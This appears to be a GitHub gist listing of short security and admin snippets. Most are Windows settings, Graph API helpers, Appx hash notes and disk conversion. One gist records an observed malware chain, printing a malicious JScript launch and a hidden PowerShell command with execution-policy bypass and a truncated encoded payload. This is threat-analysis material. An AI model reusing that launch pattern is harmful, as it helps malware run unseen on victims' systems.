wscript -> powershell -> .dll
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Uwgulbom.js"
"C:\Windows\System32\wscript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" seroplasticGodchild bankweedPolycratic unmiserly becassockedUndividedness
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABjAGEAbAB1AG0AbgBpAGEAdABlAGQARgBvAG8AbABoAGEAcgBkAGkAZQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBkAEEAQgBvAEEARwA4AEEAYwBnAEIAdQBBAEMANABBAGIAZwBCAGgAQQBHAGMAQQBiAHcAQgA1AEEARwBFAEEAegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBQAEEASABVAEEAZABBAEIAbQBBAEcAawBBAFoAUQBCAHMAQQBHAFEAQQBaAFEAQgB5AEEASABNAEEATABnAEIAeQBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQQA9AD0AegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYgBBAEIANQBBAEcATQBBAGEAQQBCAGgAQQBHAFUAQQBkAEEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEgAYwBBAGIAdwBCAHkAQQBHAHcAQQBaAEEAQQA9ACIAOwAk
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| tar xvf example.ova | |
| qemu-img convert -O qcow2 example.vmdk example.qcow2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Set Dark Mode | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name AppsUseLightTheme -Value 0 | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name SystemUsesLightTheme -Value 0 | |
| # Taskbar preferences | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarAl -Value 0 # Align Left | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarDa -Value 0 # Hide Widgets | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarMn -Value 0 # Hide Chat | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name ShowTaskViewButton -Value 0 # Hide TaskView | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Search -Name SearchBoxTaskbarMode -Value 0 # Hide SearchBox |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # hacky one-liner to extract all hardcoded user agents from GraphRunner | |
| curl -s https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1 | grep '$UserAgent =' | grep -v 'Invoke' | awk '{ gsub(/\$UserAgent = /, ""); $1=$1; print }' | sed 's/"//g' | sed "s/'//g" |
Scenario: You only have the AppxBlockMap.xml from a potentially malicious Appx. You'd like to identify the original PE contained in the Appx.
AppxBlockMap.xml contains a list of files and their hashes contained in an Appx bundle. Each file is contained in a <File></File> xml
block. You can search for the string <File Name= to see each file or search directly for the relevant .exe. The file hash is the
last element (<b4:FileHash>) and is base64 encoded.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| cat '/Users/<username>/Library/Application Support/Google/Chrome/Default/Extensions/'*/*/manifest.json | jq -r '.name' | grep -v __MSG |
petergs
/ graph-api-token-from-stdin-template.py
Last active
October 18, 2024 23:55
graph-api-token-from-stdin-template.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| MS_GRAPH_API_BASE_URL = "https://graph.microsoft.com" | |
| if __name__ == "__main__": | |
| if sys.stdin is not None: | |
| access_token = sys.stdin.readline().rstrip() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib.request | |
| import urllib.parse | |
| import urllib.error | |
| def urlreq(method: str, url: str, headers: dict = {}, data: dict | None = None) -> str: | |
| encoded_data = None | |
| if data is not None: | |
| if method == "GET": | |
| # urlencode data as path parameters | |
| params = "&".join( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # pre-consented first-party Microsoft apps with registered service principals | |
| mgc service-principals list --all --filter "appOwnerOrganizationId eq f8cdef31-a31e-4b4a-93e4-5f571e91255a" --count true --consistency-level eventual --select id,displayName |
csv of pre-consented first-party applications listed via the servicePrincipals endpoint
The list (microsoft-first-party-applications.csv) can be generated via
mgc service-principals list --all --filter "appOwnerOrganizationId eq f8cdef31-a31e-4b4a-93e4-5f571e91255a" --count true --consistency-level eventual --select appId,displayName | jq -r '.value[] | [.appId, .displayName] | @csv'
This list is more extensive, but is missing entries compared to this page from Microsoft Documentation: Verify first-party Microsoft applications in sign-in reports. These applications are captured in applications-from-docs.csv.
OlderNewer